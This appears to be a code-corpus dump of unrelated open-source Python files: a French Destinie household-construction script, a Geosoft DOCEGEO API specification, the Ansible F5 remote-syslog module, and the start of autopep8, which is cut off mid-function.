mere_ini = ind[['id', 'mere']]
list_enf = ['enf1', 'enf2', 'enf3', 'enf4', 'enf5', 'enf6']
        # Comparison with the parents' initial declarations
for par in ['mere', 'pere']:
            # a - Definition of the initial tables:
if par == 'pere':
par_ini = pere_ini
sexe = 0
else:
par_ini = mere_ini
sexe = 1
            # b -> build a table with three entries:
            # par_decla = identifier of the parent declaring the child
            # par_ini = identifier of the parent declared by the child
            # id = identifier of the child (declared or declaring)
par_ini = par_ini[par_ini[par] != -1]
link = ind.loc[(ind['enf1'] != -1) & (ind['sexe'] == sexe), list_enf]
link = link.stack().reset_index().rename(
columns = {'id': par, 'level_1': 'link', 0: 'id'}
)[[par, 'id']].astype(int)
link = link[link['id'] != -1]
link = merge(link, par_ini, on = 'id', suffixes=('_decla', '_ini'),
how = 'outer').fillna(-1)
link = link[(link[par + '_decla'] != -1) | (link[par + '_ini'] != -1)]
ind['men_' + par] = 0
            # c - Comparisons and determination of the links
            # Case 1: child and parent declare the same link: they live together
parents = link.loc[(link[par + '_decla'] == link[par + '_ini']), 'id']
ind.loc[parents.values, 'men_' + par] = 1
            # Case 2: children declaring a parent who does not declare them (attached to the parent's household)
            # Remarks: 8 cases for fathers, 10 for mothers
parents = link[(link[par + '_decla'] != link[par + '_ini']) & (link[par + '_decla'] == -1)]['id']
ind.loc[parents.values, 'men_' + par] = 1
log.info(str(sum(ind['men_' + par] == 1)) + " vivent avec leur " + par)
            # Case 3: parent declaring a child who does not declare the parent (because outside the household)
            # Not used for now (men_par = 0) but may be useful later for dependency
parents = link.loc[
(link[par + '_decla'] != link[par + '_ini']) & (link[par + '_ini'] == -1),
['id', par + '_decla']
].astype(int)
ind.loc[parents['id'].values, par] = parents[par + '_decla'].values
log.info(str(sum((ind[par].notnull() & (ind[par] != -1)))) + " enfants connaissent leur " + par)
self.entity_by_name['individus'] = ind.drop(list_enf, axis=1)
def corrections(self):
'''
        Checks/corrections of:
            - The reciprocity of the partners' declarations
            - The consistency of the declared civil statuses when the declarations are reciprocal
            - partner hdom: if couple_hdom=True, couples not living in the same dwelling are allowed,
            otherwise not.
'''
ind = self.entity_by_name['individus']
ind = ind.fillna(-1)
rec = ind.loc[
ind['partner'] != -1, ['id', 'partner', 'civilstate', 'pere', 'mere']] # | ind['civilstate'].isin([1,5])
reciprocity = rec.merge(rec, left_on='id', right_on='partner', suffixes=('', '_c'))
rec = reciprocity
# 1- check reciprocity of partner
assert all(rec['partner_c'] == rec['id'])
assert all(rec.loc[rec['civilstate'].isin([1, 5]), 'partner'] > -1)
# 2- priority to marriage
rec.loc[rec['civilstate_c'] == 1, 'civilstate'] = 1
ind.loc[ind['partner'] != -1, 'civilstate'] = rec['civilstate'].values
        # 3 - false partner (or couple living in separate dwellings)
ind.loc[ind['civilstate'].isin([1, 5]) & (ind['partner'] == -1), 'civilstate'] = 2
        # correction: comes directly from the Destinie base
rec.loc[rec['pere_c'] == rec['pere'], 'pere'] = -1
rec.loc[rec['mere_c'] == rec['mere'], 'mere'] = -1
ind.loc[ind['partner'] != -1, 'pere'] = rec['pere'].values
ind.loc[ind['partner'] != -1, 'mere'] = rec['mere'].values
self.entity_by_name['individus'] = ind
def creation_menage(self):
ind = self.entity_by_name['individus']
survey_year = self.survey_year
ind['quimen'] = -1
ind['idmen'] = -1
# TODO: add a random integer for month
ind['age_en_mois'] = 12 * (survey_year - ind['naiss'])
ind.fillna(-1, inplace=True)
        # Step 1: determine the household heads
        # (a) - Over 25, or over 17 and declaring neither a father nor a mother
maj = (
(ind.loc[:, 'age_en_mois'] >= 12 * 25) |
((ind.loc[:, 'men_pere'] == 0) & (ind.loc[:, 'men_mere'] == 0) & (ind.loc[:, 'age_en_mois'] > 12 * 16))
).copy()
ind.loc[maj, 'quimen'] = 0
log.info('nb_sans_menage_a: {}'.format(len(ind.loc[~ind['quimen'].isin([0, 1]), :])))
        # (b) - People supporting other individuals
        # Mothers with dependent children: (adds no household)
enf_mere = ind.loc[
(ind['men_pere'] == 0) & (ind['men_mere'] == 1) & (ind['age_en_mois'] <= 12 * 25),
'mere',
].astype(int)
ind.loc[enf_mere.values, 'quimen'] = 0
        # Fathers with dependent children: (adds no household)
enf_pere = ind.loc[
(ind['men_mere'] == 0) & (ind['men_pere'] == 1) & (ind['age_en_mois'] <= 12 * 25),
'pere',
].astype(int)
ind.loc[enf_pere.values, 'quimen'] = 0
        log.info('nb_sans_menage_b: {}'.format(len(ind.loc[~ind['quimen'].isin([0, 1]), :])))
        # (c) - Correction for people in a couple who are not dependents [smallest identifier = household head]
ind.loc[(ind['partner'] > ind['id']) & (ind['partner'] != -1) & (ind['quimen'] != -2), 'quimen'] = 0
ind.loc[(ind['partner'] < ind['id']) & (ind['partner'] != -1) & (ind['quimen'] != -2), 'quimen'] = 1
log.info(str(len(ind[ind['quimen'] == 0])) + u" ménages ont été constitués ") # 20815
log.info(u" dont " + str(len(ind[ind['quimen'] == 1])) + " couples") # 9410
        # Step 2: assign the household number using the household heads
nb_men = len(ind.loc[(ind['quimen'] == 0), :])
        # NB: the first 10 households correspond to institutions rather than ordinary households
        # 0 -> DASS, 1 ->
ind.loc[ind['quimen'] == 0, 'idmen'] = range(10, nb_men + 10)
        # Step 3: attach the other household members
        # (a) - Attach the partners of people in couples
partner = ind.loc[(ind['quimen'] == 1), ['id', 'partner']].astype(int)
ind['idmen'][partner['id'].values] = ind['idmen'][partner['partner'].values].copy()
        # (b) - Attach their children (mother's household first, then the father's)
for par in ['mere', 'pere']:
enf_par = ind.loc[((ind['men_' + par] == 1) & (ind['idmen'] == -1)), ['id', par]].astype(int)
ind['idmen'][enf_par['id']] = ind['idmen'][enf_par[par]].copy()
# print str(sum((ind['idmen']!= -1))) + " personnes ayant un ménage attribué"
        # TODO: (when we reach the dependency-management step):
        # create a fictitious retirement-home household + an assignment behaviour.
ind['tuteur'] = -1
# # (c) - Rattachements des éventuels parents à charge
# # Personnes ayant un parent à charge de plus de 75 ans : (rajoute 190 ménages)
# care = {}
# for par in ['mere', 'pere']:
# care_par = ind.loc[(ind['men_' + par] == 1), ['id',par]].astype(int)
# par_care = ind.loc[
# (ind['age_en_mois'] > 12*74) & (ind['id'].isin(care_par[par].values) & (ind['partner'] == -1)),
# ['id']
# ]
# care_par = care_par.merge(par_care, left_on=par, right_on='id', how='inner',
# suffixes = ('_enf', '_'+par))[['id_enf', 'id_'+par]]
# #print 'Nouveaux ménages' ,len(ind.loc[(ind['id'].isin(care_par['id_enf'].values)) & ind['quimen']!= 0])
# # Enfant ayant des parents à charge deviennent tête de ménage, parents à charge n'ont pas de foyers
# ind.loc[care_par['id_enf'], 'quimen'] = 0
# ind.loc[care_par['id_' + par], 'quimen'] = -2 # pour identifier les couples à charge
# # Si personne potentiellement à la charge de plusieurs enfants -> à charge de l'enfant ayant l'identifiant
# # le plus petit
# care_par.drop_duplicates('id_' + par, inplace=True)
# care[par] = care_par
# print str(len(care_par)) +" " + par + "s à charge"
#
# for par in ['mere', 'pere']:
# care_par = care[par]
# care_par = ind.loc[ind['id'].isin(care_par['id_enf'].values) & (ind['idmen'] != -1), par]
# ind.loc[care_par.values,'idmen'] = ind.loc[care_par.index.values,'idmen']
# ind.loc[care_par.values,'tuteur'] = care_par.index.values
# #print str(sum((ind['idmen']!= -1))) + " personnes ayant un ménage attribué"
# # Rétablissement de leur quimen
# ind['quimen'].replace(-2, 2, inplace=True)
# # Rq : il faut également rattacher le deuxième parent :
# partner_dep = ind.loc[(ind['idmen'] == -1) & (ind['partner'] != -1), ['id', 'partner']]
# ind['idmen'][partner_dep['id'].values] = ind['idmen'][partner_dep['partner'].values]
# assert ind.loc[(ind['tuteur'] != -1), 'age_en_mois'].min() > 12*70
        # Step 4: create a residual fictitious household:
        # Children without parents: placed in a fictitious household equivalent to the DASS = 0
ind.loc[(ind['idmen'] == -1) & (ind['age_en_mois'] < 12 * 18), 'idmen'] = 0
        # Step 5: final formatting
        # assign quimen for the non-reference persons
ind.loc[~ind['quimen'].isin([0, 1]), 'quimen'] = 2
        # drop the variables that are no longer needed
ind.drop(['men_pere', 'men_mere'], axis=1, inplace=True)
        # Step 6: create the men table
men = ind.loc[ind['quimen'] == 0, ['id', 'idmen']].copy()
men.rename(columns={'id': 'pref', 'idmen': 'id'}, inplace=True)
        # Add the fictitious households
to_add = DataFrame([np.zeros(len(men.columns))], columns = men.columns)
to_add['pref'] = -1
to_add['id'] = 0
men = concat([men, to_add], axis = 0, join='outer', ignore_index=True)
for var in ['loyer', 'tu', 'zeat', 'surface', 'resage', 'restype', 'reshlm', 'zcsgcrds', 'zfoncier', 'zimpot',
'zpenaliv', 'zpenalir', 'zpsocm', 'zrevfin']:
men[var] = 0
men['pond'] = 1
men['period'] = self.survey_date
men.fillna(-1, inplace=True)
ind.fillna(-1, inplace=True)
log.info(ind[ind['idmen'] == -1].to_string())
        # Every individual must belong to a household
assert sum((ind['idmen'] == -1)) == 0
assert sum((ind['quimen'] < 0)) == 0
        # Check that there is no more than one household head per household
assert max(ind.loc[ind['quimen'] == 0, :].groupby('idmen')['quimen'].count()) == 1
log.info('Taille de la table men : {}'.format(len(men)))
self.entity_by_name['individus'] = ind
self.entity_by_name['menages'] = men
def add_futur(self):
log.info(u"Début de l'actualisation des changements jusqu'en 2060")
        # TODO: move this into DataTil
ind = self.entity_by_name['individus']
futur = self.futur
men = self.entity_by_name['menages']
past = self.past
foy = self.entity_by_name['foyers_fiscaux']
for data in [futur, past]:
if data is not None:
for var in ind.columns:
if var not in data.columns:
data[var] = -1
        # Add these data to the 2009 information
        # TODO: make sure this is right.
ind = concat([ind, futur], axis=0, join='outer', ignore_index=True)
ind.fillna(-1, inplace=True)
men.fillna(-1, inplace=True)
foy.fillna(-1, inplace=True)
ind.sort(['period', 'id'], inplace=True)
self.entity_by_name['individus'] = ind
self.entity_by_name['menages'] = men
self.entity_by_name['foyers_fiscaux'] = foy
log.info(u"Fin de l'actualisation des changements jusqu'en 2060")
if __name__ == '__main__':
logging.basicConfig(level = logging.INFO, stream = sys.stdout)
data = Destinie()
start_t = time.time()
    # (a) - Import the data and preliminary corrections
data.load()
data.format_initial()
    # (b) - Work on the initial base (survey-year data)
ini_t = time.time()
data.enf_to_par()
data.corrections()
data.creation_menage()
data.creation_foy()
    # (c) - Add the future information and convert to the Liam format
futur_t = time.time()
# data.add_futur()
data.format_to_liam()
data.final_check()
data.store_to_liam()
log.info(
"Temps Destiny.py : " + str(time.time() - start_t) + "s, dont " +
str(futur_t - ini_t) + "s pour les mises en formes/corrections initiales et " +
str(time.time() - futur_t) + "s pour l'ajout des informations futures et la mise au format Liam"
)
| gpl-3.0 | -679,478,304,218,613,800 | 47.010309 | 120 | 0.533498 | false |
GeosoftInc/gxapi | spec/ps/DOCEGEO.py | 1 | 5366 | from .. import Availability, Class, Constant, Define, Method, Parameter, Type
gx_class = Class('DOCEGEO',
doc="Technical Services GX functions Header File for Docegeo")
gx_defines = [
]
gx_methods = {
'Docegeo': [
Method('IPSectionPlot_DOCEGEO', module='geocsdocegeo', version='6.3.0',
availability=Availability.EXTENSION,
doc="Docegeo IP section plot",
return_type=Type.VOID,
return_doc="Nothing",
parameters = [
Parameter('param0', type="IP",
doc="IP handle"),
Parameter('param1', type="DB",
doc="GDB handle"),
Parameter('param2', type=Type.STRING,
doc="Current line"),
Parameter('param3', type=Type.STRING,
doc="Map tag name"),
Parameter('param4', type=Type.STRING,
doc="Map name"),
Parameter('param5', type=Type.STRING,
doc="Control file")
]),
Method('WPSectionPlot_DOCEGEO', module='geocsdocegeo', version='6.3.0',
availability=Availability.EXTENSION,
doc="Docegeo Target section plot",
return_type=Type.VOID,
return_doc="Nothing",
parameters = [
Parameter('param0', type="DH",
doc="DH handle"),
Parameter('param1', type=Type.STRING,
doc="Map name"),
Parameter('param2', type=Type.STRING,
doc="Section INI (*.ins) file")
]),
Method('QCReject_DOCEGEO', module='geocsdocegeo', version='6.3.0',
availability=Availability.EXTENSION,
doc="QC reject function",
return_type=Type.VOID,
return_doc="Nothing",
parameters = [
Parameter('param0', type="DB",
doc="DB handle"),
Parameter('param1', type="DB_SYMB",
doc="Line"),
Parameter('param2', type=Type.INT32_T,
doc="New QC channel?"),
Parameter('param3', type="DB_SYMB",
doc="QC channel symbol"),
Parameter('param4', type=Type.DOUBLE,
doc="Min I"),
Parameter('param5', type=Type.DOUBLE,
doc="Max Noise"),
Parameter('param6', type=Type.DOUBLE,
doc="Max Error"),
Parameter('param7', type=Type.DOUBLE,
doc="Max RS"),
Parameter('param8', type=Type.DOUBLE,
doc="Max Vp"),
Parameter('param9', type="DB_SYMB",
doc="I Channel"),
Parameter('param10', type="DB_SYMB",
doc="IP Channel"),
Parameter('param11', type="DB_SYMB",
doc="Err Channel"),
Parameter('param12', type="DB_SYMB",
doc="Rs Channel"),
Parameter('param13', type="DB_SYMB",
doc="Vp Channel"),
Parameter('param14', type="DB_SYMB",
doc="IPlog Channel")
]),
Method('PlotThompson_DOCEGEO', module='geocsdocegeo', version='6.3.0',
availability=Availability.EXTENSION,
doc="Thompson duplicate results plot",
return_type=Type.VOID,
return_doc="Nothing",
parameters = [
Parameter('param0', type="MVIEW",
doc="MVIEW handle"),
Parameter('param1', type="VV",
doc="Data"),
Parameter('param2', type=Type.DOUBLE,
doc="Detect limit"),
Parameter('param3', type=Type.STRING,
doc="Plot title"),
Parameter('param4', type=Type.STRING,
doc="Unit"),
Parameter('param5', type=Type.DOUBLE,
doc="X location"),
Parameter('param6', type=Type.DOUBLE,
doc="Y location"),
Parameter('param7', type=Type.DOUBLE,
doc="X size"),
Parameter('param8', type=Type.DOUBLE,
doc="Y size")
]),
Method('PlobPlot_DOCEGEO', module='geocsdocegeo', version='6.3.0',
availability=Availability.EXTENSION,
doc="Docegeo ProbPlot function",
return_type=Type.VOID,
return_doc="Nothing",
parameters = [
Parameter('param0', type="DB",
doc="DB handle"),
Parameter('param1', type=Type.STRING,
doc="Control file")
])
]
}
| bsd-2-clause | -2,517,532,100,698,699,300 | 42.274194 | 79 | 0.422102 | false |
albertomurillo/ansible | lib/ansible/modules/network/f5/bigip_remote_syslog.py | 14 | 14569 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2017, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: bigip_remote_syslog
short_description: Manipulate remote syslog settings on a BIG-IP
description:
- Manipulate remote syslog settings on a BIG-IP.
version_added: 2.5
options:
remote_host:
description:
- Specifies the IP address, or hostname, for the remote system to
which the system sends log messages.
type: str
required: True
name:
description:
- Specifies the name of the syslog object.
- This option is required when multiple C(remote_host) with the same IP
or hostname are present on the device.
- If C(name) is not provided C(remote_host) is used by default.
type: str
version_added: 2.8
remote_port:
description:
- Specifies the port that the system uses to send messages to the
remote logging server.
- When creating a remote syslog, if this parameter is not specified, the
default value C(514) is used.
type: str
local_ip:
description:
- Specifies the local IP address of the system that is logging. To
provide no local IP, specify the value C(none).
- When creating a remote syslog, if this parameter is not specified, the
default value C(none) is used.
type: str
state:
description:
- When C(present), guarantees that the remote syslog exists with the provided
attributes.
- When C(absent), removes the remote syslog from the system.
type: str
choices:
- absent
- present
default: present
extends_documentation_fragment: f5
author:
- Tim Rupp (@caphrim007)
- Wojciech Wypior (@wojtek0806)
'''
EXAMPLES = r'''
- name: Add a remote syslog server to log to
bigip_remote_syslog:
remote_host: 10.10.10.10
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Add a remote syslog server on a non-standard port to log to
bigip_remote_syslog:
remote_host: 10.10.10.10
remote_port: 1234
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
'''
RETURN = r'''
remote_port:
description: New remote port of the remote syslog server.
returned: changed
type: int
sample: 514
local_ip:
description: The new local IP of the remote syslog server
returned: changed
type: str
sample: 10.10.10.10
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six import iteritems
try:
from library.module_utils.network.f5.bigip import F5RestClient
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import AnsibleF5Parameters
from library.module_utils.network.f5.common import f5_argument_spec
from library.module_utils.network.f5.compare import compare_dictionary
from library.module_utils.network.f5.common import is_valid_hostname
from library.module_utils.network.f5.common import fq_name
from library.module_utils.network.f5.ipaddress import is_valid_ip
except ImportError:
from ansible.module_utils.network.f5.bigip import F5RestClient
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import AnsibleF5Parameters
from ansible.module_utils.network.f5.common import f5_argument_spec
from ansible.module_utils.network.f5.compare import compare_dictionary
from ansible.module_utils.network.f5.common import is_valid_hostname
from ansible.module_utils.network.f5.common import fq_name
from ansible.module_utils.network.f5.ipaddress import is_valid_ip
class Parameters(AnsibleF5Parameters):
api_map = {
'remotePort': 'remote_port',
'localIp': 'local_ip',
'host': 'remote_host',
}
updatables = [
'remote_port',
'local_ip',
'remote_host',
'name',
]
returnables = [
'remote_port',
'local_ip',
'remote_host',
'name',
'remoteServers',
]
api_attributes = [
'remotePort',
'localIp',
'host',
'name',
'remoteServers',
]
class ApiParameters(Parameters):
pass
class ModuleParameters(Parameters):
@property
def remote_host(self):
if is_valid_ip(self._values['remote_host']):
return self._values['remote_host']
elif is_valid_hostname(self._values['remote_host']):
return str(self._values['remote_host'])
raise F5ModuleError(
"The provided 'remote_host' is not a valid IP or hostname"
)
@property
def remote_port(self):
if self._values['remote_port'] in [None, 'none']:
return None
if self._values['remote_port'] == 0:
raise F5ModuleError(
"The 'remote_port' value must between 1 and 65535"
)
return int(self._values['remote_port'])
@property
def local_ip(self):
if self._values['local_ip'] in [None, 'none']:
return None
if is_valid_ip(self._values['local_ip']):
return self._values['local_ip']
else:
raise F5ModuleError(
"The provided 'local_ip' is not a valid IP address"
)
@property
def name(self):
if self._values['remote_host'] is None:
return None
if self._values['name'] is None:
return None
name = fq_name(self.partition, self._values['name'])
return name
class Changes(Parameters):
def to_return(self):
result = {}
try:
for returnable in self.returnables:
change = getattr(self, returnable)
if isinstance(change, dict):
result.update(change)
else:
result[returnable] = change
result = self._filter_params(result)
except Exception:
pass
return result
class UsableChanges(Changes):
pass
class ReportableChanges(Changes):
@property
def remote_port(self):
if self._values['remote_port'] is None:
return None
return int(self._values['remote_port'])
@property
def remoteServers(self):
pass
class Difference(object):
def __init__(self, want, have=None):
self.want = want
self.have = have
self._local_ip = None
self._remote_port = None
def compare(self, param):
try:
result = getattr(self, param)
return result
except AttributeError:
return self.__default(param)
def __default(self, param):
attr1 = getattr(self.want, param)
try:
attr2 = getattr(self.have, param)
if attr1 != attr2:
return attr1
except AttributeError:
return attr1
class ModuleManager(object):
def __init__(self, *args, **kwargs):
self.module = kwargs.pop('module', None)
self.client = F5RestClient(**self.module.params)
self.want = ModuleParameters(params=self.module.params)
self.have = ApiParameters()
self.changes = UsableChanges()
# A list of all the syslogs queried from the API when reading current info
# from the device. This is used when updating the API as the value that needs
# to be updated is a list of syslogs and PATCHing a list would override any
# default settings.
self.syslogs = dict()
def _announce_deprecations(self, result):
warnings = result.pop('__warnings', [])
for warning in warnings:
self.module.deprecate(
msg=warning['msg'],
version=warning['version']
)
def _update_changed_options(self):
diff = Difference(self.want, self.have)
updatables = Parameters.updatables
changed = dict()
for k in updatables:
change = diff.compare(k)
if change is None:
continue
else:
if isinstance(change, dict):
changed.update(change)
else:
changed[k] = change
if changed:
self.changes = UsableChanges(params=changed)
return True
return False
def format_syslogs(self, syslogs):
result = None
for x in syslogs:
syslog = ApiParameters(params=x)
self.syslogs[syslog.name] = x
if syslog.name == self.want.name:
result = syslog
elif syslog.remote_host == self.want.remote_host:
result = syslog
if not result:
return ApiParameters()
return result
def exec_module(self):
result = dict()
changed = self.present()
reportable = ReportableChanges(params=self.changes.to_return())
changes = reportable.to_return()
result.update(**changes)
result.update(dict(changed=changed))
self._announce_deprecations(result)
return result
def present(self):
return self.update()
def should_update(self):
result = self._update_changed_options()
if result:
return True
return False
def update(self):
self.have = self.format_syslogs(self.read_current_from_device())
if not self.should_update() and self.want.state != 'absent':
return False
if self.module.check_mode:
return True
if self.want.name is None:
self.want.update({'name': self.want.remote_host})
syslogs = [v for k, v in iteritems(self.syslogs)]
dupes = [x for x in syslogs if x['host'] == self.want.remote_host]
if len(dupes) > 1:
raise F5ModuleError(
"Multiple occurrences of hostname: {0} detected, please specify 'name' parameter". format(self.want.remote_host)
)
        # An absent syslog does not appear in the list of existing syslogs
if self.want.state == 'absent':
if self.want.name not in self.syslogs:
return False
# At this point we know the existing syslog is not absent, so we need
# to change it in some way.
#
# First, if we see that the syslog is in the current list of syslogs,
# we are going to update it
changes = dict(self.changes.api_params())
if self.want.name in self.syslogs:
self.syslogs[self.want.name].update(changes)
else:
# else, we are going to add it to the list of syslogs
self.syslogs[self.want.name] = changes
# Since the name attribute is not a parameter tracked in the Parameter
# classes, we will add the name to the list of attributes so that when
# we update the API, it creates the correct vector
self.syslogs[self.want.name].update({'name': self.want.name})
# Finally, the absent state forces us to remove the syslog from the
# list.
if self.want.state == 'absent':
del self.syslogs[self.want.name]
# All of the syslogs must be re-assembled into a list of dictionaries
# so that when we PATCH the API endpoint, the syslogs list is filled
# correctly.
#
# There are **not** individual API endpoints for the individual syslogs.
# Instead, the endpoint includes a list of syslogs that is part of the
# system config
result = [v for k, v in iteritems(self.syslogs)]
self.changes = Changes(params=dict(remoteServers=result))
self.changes.update(self.want._values)
self.update_on_device()
return True
def update_on_device(self):
params = self.changes.api_params()
params = dict(
remoteServers=params.get('remoteServers')
)
uri = "https://{0}:{1}/mgmt/tm/sys/syslog/".format(
self.client.provider['server'],
self.client.provider['server_port'],
)
resp = self.client.api.patch(uri, json=params)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] in [400, 409]:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
def read_current_from_device(self):
uri = "https://{0}:{1}/mgmt/tm/sys/syslog/".format(
self.client.provider['server'],
self.client.provider['server_port'],
)
resp = self.client.api.get(uri)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
result = response.get('remoteServers', [])
return result
class ArgumentSpec(object):
def __init__(self):
self.supports_check_mode = True
argument_spec = dict(
remote_host=dict(
required=True
),
remote_port=dict(),
local_ip=dict(),
name=dict(),
state=dict(
default='present',
choices=['absent', 'present']
)
)
self.argument_spec = {}
self.argument_spec.update(f5_argument_spec)
self.argument_spec.update(argument_spec)
def main():
spec = ArgumentSpec()
module = AnsibleModule(
argument_spec=spec.argument_spec,
supports_check_mode=spec.supports_check_mode
)
try:
mm = ModuleManager(module=module)
results = mm.exec_module()
module.exit_json(**results)
except F5ModuleError as ex:
module.fail_json(msg=str(ex))
if __name__ == '__main__':
main()
| gpl-3.0 | -3,912,569,845,770,745,000 | 30.063966 | 132 | 0.599149 | false |
Distrotech/intellij-community | python/helpers/pydev/third_party/pep8/autopep8.py | 21 | 121747 | #!/usr/bin/env python
#
# Copyright (C) 2010-2011 Hideo Hattori
# Copyright (C) 2011-2013 Hideo Hattori, Steven Myint
# Copyright (C) 2013-2014 Hideo Hattori, Steven Myint, Bill Wendling
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""Automatically formats Python code to conform to the PEP 8 style guide.
Fixes that only need be done once can be added by adding a function of the form
"fix_<code>(source)" to this module. They should return the fixed source code.
These fixes are picked up by apply_global_fixes().
Fixes that depend on pep8 should be added as methods to FixPEP8. See the class
documentation for more information.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import bisect
import codecs
import collections
import copy
import difflib
import fnmatch
import inspect
import io
import itertools
import keyword
import locale
import os
import re
import signal
import sys
import token
import tokenize
import pep8
try:
unicode
except NameError:
unicode = str
__version__ = '1.0.3'
CR = '\r'
LF = '\n'
CRLF = '\r\n'
PYTHON_SHEBANG_REGEX = re.compile(r'^#!.*\bpython[23]?\b\s*$')
# For generating line shortening candidates.
SHORTEN_OPERATOR_GROUPS = frozenset([
frozenset([',']),
frozenset(['%']),
frozenset([',', '(', '[', '{']),
frozenset(['%', '(', '[', '{']),
frozenset([',', '(', '[', '{', '%', '+', '-', '*', '/', '//']),
frozenset(['%', '+', '-', '*', '/', '//']),
])
DEFAULT_IGNORE = 'E24'
DEFAULT_INDENT_SIZE = 4
# W602 is handled separately due to the need to avoid "with_traceback".
CODE_TO_2TO3 = {
'E721': ['idioms'],
'W601': ['has_key'],
'W603': ['ne'],
'W604': ['repr'],
'W690': ['apply',
'except',
'exitfunc',
'import',
'numliterals',
'operator',
'paren',
'reduce',
'renames',
'standarderror',
'sys_exc',
'throw',
'tuple_params',
'xreadlines']}
def check_lib2to3():
try:
import lib2to3
except ImportError:
sys.path.append(os.path.join(os.path.dirname(__file__), 'lib2to3'))
import lib2to3
def open_with_encoding(filename, encoding=None, mode='r'):
"""Return opened file with a specific encoding."""
if not encoding:
encoding = detect_encoding(filename)
return io.open(filename, mode=mode, encoding=encoding,
newline='') # Preserve line endings
def detect_encoding(filename):
"""Return file encoding."""
try:
with open(filename, 'rb') as input_file:
check_lib2to3()
from lib2to3.pgen2 import tokenize as lib2to3_tokenize
encoding = lib2to3_tokenize.detect_encoding(input_file.readline)[0]
# Check for correctness of encoding
with open_with_encoding(filename, encoding) as test_file:
test_file.read()
return encoding
except (LookupError, SyntaxError, UnicodeDecodeError):
return 'latin-1'
def readlines_from_file(filename):
"""Return contents of file."""
with open_with_encoding(filename) as input_file:
return input_file.readlines()
def extended_blank_lines(logical_line,
blank_lines,
indent_level,
previous_logical):
"""Check for missing blank lines after class declaration."""
if previous_logical.startswith('class '):
if (
logical_line.startswith(('def ', 'class ', '@')) or
pep8.DOCSTRING_REGEX.match(logical_line)
):
if indent_level and not blank_lines:
yield (0, 'E309 expected 1 blank line after class declaration')
elif previous_logical.startswith('def '):
if blank_lines and pep8.DOCSTRING_REGEX.match(logical_line):
yield (0, 'E303 too many blank lines ({0})'.format(blank_lines))
elif pep8.DOCSTRING_REGEX.match(previous_logical):
# Missing blank line between class docstring and method declaration.
if (
indent_level and
not blank_lines and
logical_line.startswith(('def ')) and
'(self' in logical_line
):
yield (0, 'E301 expected 1 blank line, found 0')
pep8.register_check(extended_blank_lines)
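# A hedged illustration (editor-added) of the E309 case registered above:
#
#     class Example(object):
#         def method(self):        # no blank line after the class declaration
#             pass
#
# would be reported as "E309 expected 1 blank line after class declaration",
# while a single blank line between the class line and the first def satisfies
# the check.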
def continued_indentation(logical_line, tokens, indent_level, indent_char,
noqa):
"""Override pep8's function to provide indentation information."""
first_row = tokens[0][2][0]
nrows = 1 + tokens[-1][2][0] - first_row
if noqa or nrows == 1:
return
# indent_next tells us whether the next block is indented. Assuming
# that it is indented by 4 spaces, then we should not allow 4-space
# indents on the final continuation line. In turn, some other
# indents are allowed to have an extra 4 spaces.
indent_next = logical_line.endswith(':')
row = depth = 0
valid_hangs = (
(DEFAULT_INDENT_SIZE,)
if indent_char != '\t' else (DEFAULT_INDENT_SIZE,
2 * DEFAULT_INDENT_SIZE)
)
# Remember how many brackets were opened on each line.
parens = [0] * nrows
# Relative indents of physical lines.
rel_indent = [0] * nrows
# For each depth, collect a list of opening rows.
open_rows = [[0]]
# For each depth, memorize the hanging indentation.
hangs = [None]
# Visual indents.
indent_chances = {}
last_indent = tokens[0][2]
indent = [last_indent[1]]
last_token_multiline = None
line = None
last_line = ''
last_line_begins_with_multiline = False
for token_type, text, start, end, line in tokens:
newline = row < start[0] - first_row
if newline:
row = start[0] - first_row
newline = (not last_token_multiline and
token_type not in (tokenize.NL, tokenize.NEWLINE))
last_line_begins_with_multiline = last_token_multiline
if newline:
# This is the beginning of a continuation line.
last_indent = start
# Record the initial indent.
rel_indent[row] = pep8.expand_indent(line) - indent_level
# Identify closing bracket.
close_bracket = (token_type == tokenize.OP and text in ']})')
# Is the indent relative to an opening bracket line?
for open_row in reversed(open_rows[depth]):
hang = rel_indent[row] - rel_indent[open_row]
hanging_indent = hang in valid_hangs
if hanging_indent:
break
if hangs[depth]:
hanging_indent = (hang == hangs[depth])
visual_indent = (not close_bracket and hang > 0 and
indent_chances.get(start[1]))
if close_bracket and indent[depth]:
# Closing bracket for visual indent.
if start[1] != indent[depth]:
yield (start, 'E124 {0}'.format(indent[depth]))
elif close_bracket and not hang:
pass
elif indent[depth] and start[1] < indent[depth]:
